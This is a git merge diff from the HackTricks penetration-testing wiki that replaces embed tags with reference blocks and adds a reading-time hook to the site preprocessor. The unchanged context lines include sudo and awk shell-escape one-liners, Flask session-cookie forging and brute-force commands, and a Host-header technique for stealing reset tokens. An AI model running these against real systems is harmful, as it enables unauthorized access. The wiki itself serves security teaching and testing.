Merge pull request #991 from HackTricks-wiki/fix-embeded-urls

Fix embed urls

hacktricks-preprocessor.py

@@ -69,6 +69,12 @@ def ref(matchobj):
     return result
 
 
+def add_read_time(content):
+    regex = r'(<\/style>\n# .*(?=\n))'
+    new_content = re.sub(regex, lambda x: x.group(0) + "\n\nReading time: {{ #reading_time }}", content)
+    return new_content
+
+
 def iterate_chapters(sections):
     if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section
         return
@@ -99,6 +105,7 @@ if __name__ == '__main__':
         current_chapter = chapter
         regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'
         new_content = re.sub(regex, ref, chapter['content'])
+        new_content = add_read_time(new_content)
         chapter['content'] = new_content
 
     content = json.dumps(book)

src/README.md

@@ -1,13 +1,10 @@
 # HackTricks
 
-Reading time: {{ #reading_time }}
-
 <figure><img src="images/hacktricks.gif" alt=""><figcaption></figcaption></figure>
 
 _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
 
-> [!TIP]
-> **Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.**
+> [!TIP] > **Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.**
 
 To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:**
 
@@ -35,7 +32,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 [**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
 
-{% embed url="https://www.rootedcon.com/" %}
+{{#ref}}
+https://www.rootedcon.com/
+{{#endref}}
 
 ---
 
@@ -47,7 +46,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 
-{% embed url="https://go.intigriti.com/hacktricks" %}
+{{#ref}}
+https://go.intigriti.com/hacktricks
+{{#endref}}
 
 ---
 
@@ -60,7 +61,9 @@ Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banne
 
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{{#ref}}
+https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks
+{{#endref}}
 
 ---
 
@@ -86,7 +89,9 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
 
 **Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
 
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
+{{#ref}}
+https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons
+{{#endref}}
 
 ---
 
@@ -111,7 +116,9 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign_up)*
 
 Learn the technologies and skills required to perform vulnerability research, penetration testing, and reverse engineering to protect mobile applications and devices. **Master iOS and Android security** through our on-demand courses and **get certified**:
 
-{% embed url="https://academy.8ksec.io/" %}
+{{#ref}}
+https://academy.8ksec.io/
+{{#endref}}
 
 ---
 
@@ -127,7 +134,9 @@ Another cool thing about WebSec is that unlike the industry average WebSec is **
 
 In addition to the above WebSec is also a **committed supporter of HackTricks.**
 
-{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
+{{#ref}}
+https://www.youtube.com/watch?v=Zq2JycGDCPM
+{{#endref}}
 
 ## License & Disclaimer
 
@@ -143,5 +152,3 @@ welcome/hacktricks-values-and-faq.md
 
 {{#include ./banners/hacktricks-training.md}}
 
-
-

src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md

@@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca
 
 Chek this video for a nice explanation about this technique in the second half of the video:
 
-{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
+{{#ref}}
+https://youtu.be/ADULSwnQs-s?feature=shared
+{{#endref}}
 
 Or check these pages for a step-by-step explanation:
 
@@ -196,5 +198,3 @@ target.interactive()
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
-

src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md

@@ -59,7 +59,9 @@ If you are curious this is the **sigcontext structure** stored in the stack to l
 
 For a better explanation check also:
 
-{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
+{{#ref}}
+https://youtu.be/ADULSwnQs-s?feature=shared
+{{#endref}}
 
 ## Example
 
@@ -144,5 +146,3 @@ target.interactive()
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-
-

src/burp-suite.md

@@ -10,11 +10,10 @@
 
 [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
 
-{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
+{{#ref}}
+https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e
+{{#endref}}
 
 [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
 
 {{#include ./banners/hacktricks-training.md}}
-
-
-

src/crypto-and-stego/esoteric-languages.md

@@ -52,7 +52,9 @@ Take it to the top
 Whisper my world
 ```
 
-{% embed url="https://codewithrockstar.com/" %}
+{{#ref}}
+https://codewithrockstar.com/
+{{#endref}}
 
 ## PETOOH
 
@@ -68,5 +70,3 @@ Kukarek
 
 {{#include ../banners/hacktricks-training.md}}
 
-
-

src/crypto-and-stego/hash-length-extension-attack.md

@@ -29,7 +29,9 @@ If an attacker wants to append the string "append" he can:
 
 ### **Tool**
 
-{% embed url="https://github.com/iagox86/hash_extender" %}
+{{#ref}}
+https://github.com/iagox86/hash_extender
+{{#endref}}
 
 ### References
 
@@ -37,5 +39,3 @@ You can find this attack good explained in [https://blog.skullsecurity.org/2012/
 
 {{#include ../banners/hacktricks-training.md}}
 
-
-

src/crypto-and-stego/rc4-encrypt-and-decrypt.md

@@ -4,11 +4,13 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en
 
 If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
 
-{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
+{{#ref}}
+https://0xrick.github.io/hack-the-box/kryptos/
+{{#endref}}
 
-{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
+{{#ref}}
+https://0xrick.github.io/hack-the-box/kryptos/
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
 
-
-

src/cryptography/hash-length-extension-attack.md

@@ -27,13 +27,12 @@ If an attacker wants to append the string "append" he can:
 
 ## **Tool**
 
-{% embed url="https://github.com/iagox86/hash_extender" %}
+{{#ref}}
+https://github.com/iagox86/hash_extender
+{{#endref}}
 
 ## References
 
 You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/cryptography/rc4-encrypt-and-decrypt.md

@@ -4,11 +4,13 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en
 
 If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
 
-{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
+{{#ref}}
+https://0xrick.github.io/hack-the-box/kryptos/
+{{#endref}}
 
-{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
+{{#ref}}
+https://0xrick.github.io/hack-the-box/kryptos/
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
 
-
-

src/generic-methodologies-and-resources/external-recon-methodology/README.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## Assets discoveries
 
 > So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
@@ -199,8 +198,6 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.
 If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
 &#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
 
-
-
 ## Subdomains
 
 > We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
@@ -482,9 +479,13 @@ echo www | subzuf facebook.com
 
 Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
 
-{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %}
+{{#ref}}
+https://trickest.com/blog/full-subdomain-discovery-using-workflow/
+{{#endref}}
 
-{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %}
+{{#ref}}
+https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/
+{{#endref}}
 
 ### **VHosts / Virtual Hosts**
 
@@ -708,8 +709,5 @@ There are several tools out there that will perform part of the proposed actions
 
 - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
 
-
 {{#include ../../banners/hacktricks-training.md}}
 
-
-

src/linux-hardening/privilege-escalation/README.md

@@ -1049,9 +1049,13 @@ The project collects legitimate functions of Unix binaries that can be abused to
 > strace -o /dev/null /bin/sh\
 > sudo awk 'BEGIN {system("/bin/sh")}'
 
-{% embed url="https://gtfobins.github.io/" %}
+{{#ref}}
+https://gtfobins.github.io/
+{{#endref}}
 
-{% embed url="https://gtfoargs.github.io/" %}
+{{#ref}}
+https://gtfoargs.github.io/
+{{#endref}}
 
 ### FallOfSudo
 
@@ -1656,5 +1660,3 @@ cisco-vmanage.md
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
-

src/linux-hardening/privilege-escalation/docker-security/README.md

@@ -341,13 +341,17 @@ In Kubernetes environments, secrets are natively supported and can be further ma
 
 **gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers.
 
-{% embed url="https://github.com/google/gvisor" %}
+{{#ref}}
+https://github.com/google/gvisor
+{{#endref}}
 
 ### Kata Containers
 
 **Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense.
 
-{% embed url="https://katacontainers.io/" %}
+{{#ref}}
+https://katacontainers.io/
+{{#endref}}
 
 ### Summary Tips
 
@@ -403,8 +407,5 @@ authz-and-authn-docker-access-authorization-plugin.md
 - [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
 - [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
 
-
 {{#include ../../../banners/hacktricks-training.md}}
 
-
-

src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md

@@ -241,9 +241,13 @@ Finally, if you don't like any of the suggestions of before, or they aren't work
 
 If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.**
 
-{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
+{{#ref}}
+https://github.com/KrustyHack/docker-privilege-escalation
+{{#endref}}
 
-{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
+{{#ref}}
+https://fosterelli.co/privilege-escalation-via-docker.html
+{{#endref}}
 
 ## lxc/lxd Group
 
@@ -263,5 +267,3 @@ These permissions may be abused with the following exploit to **escalate privile
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-
-

src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md

@@ -1,7 +1,5 @@
-
 {{#include ../../banners/hacktricks-training.md}}
 
-
 # Sudo/Admin Groups
 
 ## **PE - Method 1**
@@ -158,16 +156,17 @@ find / -group root -perm -g=w 2>/dev/null
 
 You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.
 
-{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
+{{#ref}}
+https://github.com/KrustyHack/docker-privilege-escalation
+{{#endref}}
 
-{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
+{{#ref}}
+https://fosterelli.co/privilege-escalation-via-docker.html
+{{#endref}}
 
 # lxc/lxd Group
 
 [lxc - Privilege Escalation](lxd-privilege-escalation.md)
 
-
 {{#include ../../banners/hacktricks-training.md}}
 
-
-

src/misc/references.md

@@ -1,52 +1,95 @@
 {{#include ../banners/hacktricks-training.md}}
 
-{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %}
+{{#ref}}
+https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
+{{#endref}}
 
-{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %}
+{{#ref}}
+https://hausec.com/pentesting-cheatsheet/#_Toc475368982
+{{#endref}}
 
-{% embed url="https://anhtai.me/pentesting-cheatsheet/" %}
+{{#ref}}
+https://anhtai.me/pentesting-cheatsheet/
+{{#endref}}
 
-{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
+{{#ref}}
+https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
+{{#endref}}
 
-{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %}
+{{#ref}}
+https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
+{{#endref}}
 
-{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %}
+{{#ref}}
+https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
+{{#endref}}
 
-{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %}
+{{#ref}}
+https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
+{{#endref}}
 
-{% embed url="https://anhtai.me/oscp-fun-guide/" %}
+{{#ref}}
+https://anhtai.me/oscp-fun-guide/
+{{#endref}}
 
-{% embed url="https://www.thehacker.recipes/" %}
+{{#ref}}
+https://www.thehacker.recipes/
+{{#endref}}
 
-{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %}
+{{#ref}}
+https://github.com/swisskyrepo/PayloadsAllTheThings
+{{#endref}}
 
-{% embed url="https://gtfobins.github.io/" %}
+{{#ref}}
+https://gtfobins.github.io/
+{{#endref}}
 
-{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %}
+{{#ref}}
+https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
+{{#endref}}
 
-{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %}
+{{#ref}}
+https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
+{{#endref}}
 
-{% embed url="https://hideandsec.sh/" %}
+{{#ref}}
+https://hideandsec.sh/
+{{#endref}}
 
-{% embed url="https://cheatsheet.haax.fr/" %}
+{{#ref}}
+https://cheatsheet.haax.fr/
+{{#endref}}
 
-{% embed url="https://infosecwriteups.com/" %}
+{{#ref}}
+https://infosecwriteups.com/
+{{#endref}}
 
-{% embed url="https://www.exploit-db.com/" %}
+{{#ref}}
+https://www.exploit-db.com/
+{{#endref}}
 
-{% embed url="https://wadcoms.github.io/" %}
+{{#ref}}
+https://wadcoms.github.io/
+{{#endref}}
 
-{% embed url="https://lolbas-project.github.io" %}
+{{#ref}}
+https://lolbas-project.github.io
+{{#endref}}
 
-{% embed url="https://pentestbook.six2dez.com/" %}
+{{#ref}}
+https://pentestbook.six2dez.com/
+{{#endref}}
 
-{% embed url="https://www.hackingarticles.in/" %}
+{{#ref}}
+https://www.hackingarticles.in/
+{{#endref}}
 
-{% embed url="https://pentestlab.blog/" %}
+{{#ref}}
+https://pentestlab.blog/
+{{#endref}}
 
-{% embed url="https://ippsec.rocks/" %}
+{{#ref}}
+https://ippsec.rocks/
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/5439-pentesting-redshift.md

@@ -8,9 +8,8 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P
 
 For more information check:
 
-{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %}
+{{#ref}}
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum
+{{#endref}}
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/9100-pjl.md

@@ -54,13 +54,12 @@ msf> use auxiliary/scanner/printer/printer_delete_file
 
 This is the tool you want to use to abuse printers:
 
-{% embed url="https://github.com/RUB-NDS/PRET" %}
+{{#ref}}
+https://github.com/RUB-NDS/PRET
+{{#endref}}
 
 # **Shodan**
 
 - `pjl port:9100`
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/9200-pentesting-elasticsearch.md

@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## Basic information
 
 Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats.
@@ -176,14 +175,12 @@ Some tools will obtain some of the data presented before:
 msf > use auxiliary/scanner/elasticsearch/indices_enum
 ```
 
-{% embed url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse" %}
+{{#ref}}
+https://github.com/theMiddleBlue/nmap-elasticsearch-nse
+{{#endref}}
 
 ## Shodan
 
 - `port:9200 elasticsearch`
 
-
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md

@@ -4,7 +4,9 @@
 
 # **Default passwords**
 
-{% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %}
+{{#ref}}
+http://www.vulnerabilityassessment.co.uk/passwordsC.htm
+{{#endref}}
 
 # Config files
 
@@ -19,6 +21,3 @@ jboss-service.xml
 ```
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-kerberos-88/README.md

@@ -29,7 +29,9 @@ PORT   STATE SERVICE
 
 The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest.
 
-{% embed url="https://adsecurity.org/?p=541" %}
+{{#ref}}
+https://adsecurity.org/?p=541
+{{#endref}}
 
 Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
 
@@ -66,6 +68,3 @@ Entry_4:
 ```
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-ssh.md

@@ -2,8 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
-
 ## Basic Information
 
 **SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.
@@ -135,7 +133,9 @@ Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms
 
 #### Known badkeys can be found here:
 
-{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}
+{{#ref}}
+https://github.com/rapid7/ssh-badkeys/tree/master/authorized
+{{#endref}}
 
 #### Weak SSH keys / Debian predictable PRNG
 
@@ -318,8 +318,6 @@ id_rsa
 - You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html)
 - [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
 
-
-
 ## HackTricks Automatic Commands
 
 ```
@@ -341,6 +339,3 @@ Entry_2:
 ```
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/buckets/README.md

@@ -4,9 +4,8 @@
 
 Check this page if you want to learn more about enumerating and abusing Buckets:
 
-{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" %}
+{{#ref}}
+https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
+{{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/buckets/firebase-database.md

@@ -8,9 +8,8 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused
 
 Learn more about Firebase in:
 
-{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %}
+{{#ref}}
+https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum
+{{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md

@@ -17,7 +17,9 @@ process.on("exit", function () {
 })
 ```
 
-{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}
+{{#ref}}
+https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36
+{{#endref}}
 
 ![](<../../../images/image (1070).png>)
 
@@ -61,6 +63,3 @@ Exploit:
 <figure><img src="../../../images/image (89).png" alt=""><figcaption></figcaption></figure>
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/flask.md

@@ -26,7 +26,9 @@ The cookie is also signed using a password
 
 Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
 
-{% embed url="https://pypi.org/project/flask-unsign/" %}
+{{#ref}}
+https://pypi.org/project/flask-unsign/
+{{#endref}}
 
 ```bash
 pip3 install flask-unsign
@@ -60,7 +62,9 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
 
 Command line tool to brute-force websites using cookies crafted with flask-unsign.
 
-{% embed url="https://github.com/Tagvi/ripsession" %}
+{{#ref}}
+https://github.com/Tagvi/ripsession
+{{#endref}}
 
 ```bash
   ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
@@ -100,6 +104,3 @@ app.run(host='0.0.0.0', port=8080)
 Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/graphql.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## Introduction
 
 GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes.
@@ -623,7 +622,9 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso
 
 ### Automatic Tests
 
-{% embed url="https://graphql-dashboard.herokuapp.com/" %}
+{{#ref}}
+https://graphql-dashboard.herokuapp.com/
+{{#endref}}
 
 - Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
 
@@ -637,8 +638,4 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso
 - [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
 - [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql)
 
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md

@@ -43,7 +43,9 @@ Note that even if this was done for AWS machines, it could be done for any other
 
 For a better description of this process check:
 
-{% embed url="https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{{#ref}}
+https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks
+{{#endref}}
 
 ```bash
 # Find open ports
@@ -141,6 +143,3 @@ Find more info about how to do this in the [original article](https://scrapeops.
 - [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/werkzeug.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## Console RCE
 
 If debug is active you could try to access to `/console` and gain RCE.
@@ -162,7 +161,9 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
 
 ## Automated Exploitation
 
-{% embed url="https://github.com/Ruulian/wconsole_extractor" %}
+{{#ref}}
+https://github.com/Ruulian/wconsole_extractor
+{{#endref}}
 
 ## References
 
@@ -171,8 +172,4 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
 - [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
 - [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
 
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -249,7 +249,9 @@ This is the response when it doesn't work:
 
 ## SSRF
 
-{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
+{{#ref}}
+https://github.com/t0gu/quickpress/blob/master/core/requests.go
+{{#endref}}
 
 This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.
 
@@ -435,6 +437,3 @@ Also, **only install trustable WordPress plugins and themes**.
 - Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/other-web-tricks.md

@@ -2,7 +2,6 @@
 
 {{#include ./banners/hacktricks-training.md}}
 
-
 ### Host header
 
 Several times the back-end trust the **Host header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
@@ -10,7 +9,6 @@ Several times the back-end trust the **Host header** to perform some actions. Fo
 > [!WARNING]
 > Note that it's possible that you don't even need to wait for the user to click on the reset password link to get the token, as maybe even **spam filters or other intermediary devices/bots will click on it to analyze it**.
 
-
 ### Session booleans
 
 Some times when you complete some verification correctly the back-end will **just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.\
@@ -26,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi
 
 ### Access Internal servicedesk of companies using atlassian
 
-{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
+{{#ref}}
+https://yourcompanyname.atlassian.net/servicedesk/customer/user/login
+{{#endref}}
 
 ### TRACE method
 
@@ -34,8 +34,5 @@ Developers might forget to disable various debugging options in the production e
 
 ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
 
-
 {{#include ./banners/hacktricks-training.md}}
 
-
-

src/pentesting-web/captcha-bypass.md

@@ -32,9 +32,8 @@ To **bypass** the captcha during **server testing** and automate user input func
 
